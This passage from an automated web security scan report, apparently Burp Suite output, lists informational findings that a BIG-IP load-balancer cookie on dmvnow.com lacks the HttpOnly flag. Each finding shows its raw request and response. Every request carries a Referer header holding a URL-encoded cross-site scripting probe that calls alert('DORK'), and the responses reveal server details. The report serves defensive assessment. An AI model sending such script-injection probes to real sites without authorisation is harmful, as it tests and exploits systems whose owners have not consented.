Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Mon, 09 Aug 2010 12:10:00 GMT
ETag: "09c24cabb37cb1:7c8"
Content-Length: 8143

......JFIF.....d.d......Ducky.......A......Adobe.d.........................    ....
..    ..

....
...............................

..............................................................d....
...[SNIP]...

7.164. http://www.dmvnow.com/images/breadcrumbcenter.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/breadcrumbcenter.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/breadcrumbcenter.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2007 12:56:48 GMT
ETag: "0682fc5a8c7c71:7c8"
Content-Length: 9488

......JFIF.....`.`.....fExif..II*...............>...........F...(...........1.......N.......`.......`.......Paint.NET v3.08....C....................................................................C...
...[SNIP]...

7.165. http://www.dmvnow.com/images/citserv_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/citserv_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/citserv_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:32:48 GMT
ETag: "018111d85f9c01:7c8"
Content-Length: 577

GIF89a..........f.....nnS..p...77)..|''...
DD3......{{\RR=..f^^G.oS..........................................!.......,........... .di.h..l..p,.tm.x..|...a.(.I..A1,....t..@...@p...^n.!P`.1Eb..=.."b..
...[SNIP]...

7.166. http://www.dmvnow.com/images/common_feel_bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/common_feel_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/common_feel_bg.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jun 2007 12:50:50 GMT
ETag: "031367b4ba4c71:7c8"
Content-Length: 563

......JFIF.....d.d......Ducky.......d.....&Adobe.d...........
...............1.........................................................................................................................
...[SNIP]...

7.167. http://www.dmvnow.com/images/commserv_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/commserv_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/commserv_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:32:52 GMT
ETag: "072731f85f9c01:7c8"
Content-Length: 667

GIF89a..........f.....nnS..p77).....
...''...|RR=..fDD3...^^G{{\.oS..........................................!.......,........... .di.h..l..p,.tm.x......`
R(.....D..I..D.P .........R.).h..).........8
...[SNIP]...

7.168. http://www.dmvnow.com/images/contactus_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/contactus_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/contactus_off.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:32:54 GMT
ETag: "09fa42085f9c01:7c8"
Content-Length: 397

GIF89ad.................|..p..f.z\.nR.^F.Q=.D3.6)y&.s..l
...!.......,....d...@....I..8.....PT. ..........B....,.j>..C.0|...MX..p.........c..0...W..K.]I.W..'.sv>i .
z.M~..RP20O)..
,.0.,.(..
.-:~>.A .
...[SNIP]...

7.169. http://www.dmvnow.com/images/contactus_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/contactus_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/contactus_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:32:54 GMT
ETag: "09fa42085f9c01:7c8"
Content-Length: 445

GIF89ad.......................|..p..f.{\.nS.^G.R=.D3.7)z'.s..m.
f............................................,....d...@... .di.h..l..K..Q$..nD..D Q......F.@...J.@.Y..*.QZ|..,....>..V.0 .
..[....m..Y..
...[SNIP]...

7.170. http://www.dmvnow.com/images/dmv2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmv2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmv2.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 06 Jul 2007 19:34:00 GMT
ETag: "08489a4c0c71:7c8"
Content-Length: 724

......JFIF.....d.d......Ducky.......N......Adobe.d................................................. ...............................
..
..
.........................................................#.'..
...[SNIP]...

7.171. http://www.dmvnow.com/images/dmv3.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmv3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmv3.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 06 Jul 2007 19:34:00 GMT
ETag: "08489a4c0c71:7c8"
Content-Length: 832

......JFIF.....d.d......Ducky.......N......Adobe.d................................................. ...............................
..
..
.........................................................#.'..
...[SNIP]...

7.172. http://www.dmvnow.com/images/dmv4.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmv4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmv4.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 03 Aug 2007 14:41:48 GMT
ETag: "09eb66bdcd5c71:7c8"
Content-Length: 10055

......JFIF.....`.`.....fExif..II*...............>...........F...(...........1.......N.......`.......`.......Paint.NET v3.0.N...C....................................................................C...
...[SNIP]...

7.173. http://www.dmvnow.com/images/dmv7b.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmv7b.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmv7b.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Wed, 11 Jul 2007 18:58:00 GMT
ETag: "06ca366edc3c71:7c8"
Content-Length: 8193

......JFIF.....`.`.....fExif..II*...............>...........F...(...........1.......N.......`.......`.......Paint.NET v3.0.}...C....................................................................C...
...[SNIP]...

7.174. http://www.dmvnow.com/images/dmv8b.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmv8b.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmv8b.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 06 Jul 2007 19:33:00 GMT
ETag: "03e45764c0c71:7c8"
Content-Length: 1618

......JFIF.....`.`.....fExif..II*...............>...........F...(...........1.......N.......`.......`.......Paint.NET v3.0.....C....................................................................C...
...[SNIP]...

7.175. http://www.dmvnow.com/images/dmvcontent11.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmvcontent11.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmvcontent11.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Tue, 10 Jul 2007 19:14:00 GMT
ETag: "0c6e7826c3c71:7c8"
Content-Length: 5672

......JFIF.....d.d......Ducky.......N......Adobe.d................................................. ...............................
..
..
..............................................................
...[SNIP]...

7.176. http://www.dmvnow.com/images/dmvgeneral1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmvgeneral1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmvgeneral1.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 06 Jul 2007 17:25:00 GMT
ETag: "03ea294f2bfc71:7c8"
Content-Length: 2987

......JFIF.....d.d......Ducky.......N......Adobe.d................................................. ...............................
..
..
.........................................................#....
...[SNIP]...

7.177. http://www.dmvnow.com/images/dmvhome9.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmvhome9.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmvhome9.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 06 Jul 2007 19:35:00 GMT
ETag: "0cacbbd4c0c71:7c8"
Content-Length: 36244

......JFIF.....d.d......Ducky.......N......Adobe.d................................................. ...............................
..
..
..............................................................
...[SNIP]...

7.178. http://www.dmvnow.com/images/dmvhome_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmvhome_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmvhome_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:33:00 GMT
ETag: "026382485f9c01:7c8"
Content-Length: 468

GIF89a..........f.....nnS..p77){{\..
......DD3''...f..|RR=...^^G.oS..........................................!.......,........... .di.h..l..p,.tm.x..|...E..A.....0@ .....4" ...6....e7!B......H(H.4.;.
...[SNIP]...

7.179. http://www.dmvnow.com/images/dmvnow.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/dmvnow.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dmvnow.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2007 15:58:18 GMT
ETag: "0964d153b3c71:7c8"
Content-Length: 22038

......JFIF.....d.d......Ducky.......N......Adobe.d................................................. ...............................
..
..
.........................................................d....
...[SNIP]...

7.180. http://www.dmvnow.com/images/forms_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/forms_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/forms_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:33:16 GMT
ETag: "08ec12d85f9c01:7c8"
Content-Length: 684

GIF89a..........f.....nnS..p77).....
.....|^^G...DD3''...fRR={{\.oS..........................................!.......,........... .di.h..l..p,.tm.x.. ........e..rp...$..Px.L..s$(....a....j.........%
...[SNIP]...

7.181. http://www.dmvnow.com/images/geninfo_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/geninfo_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

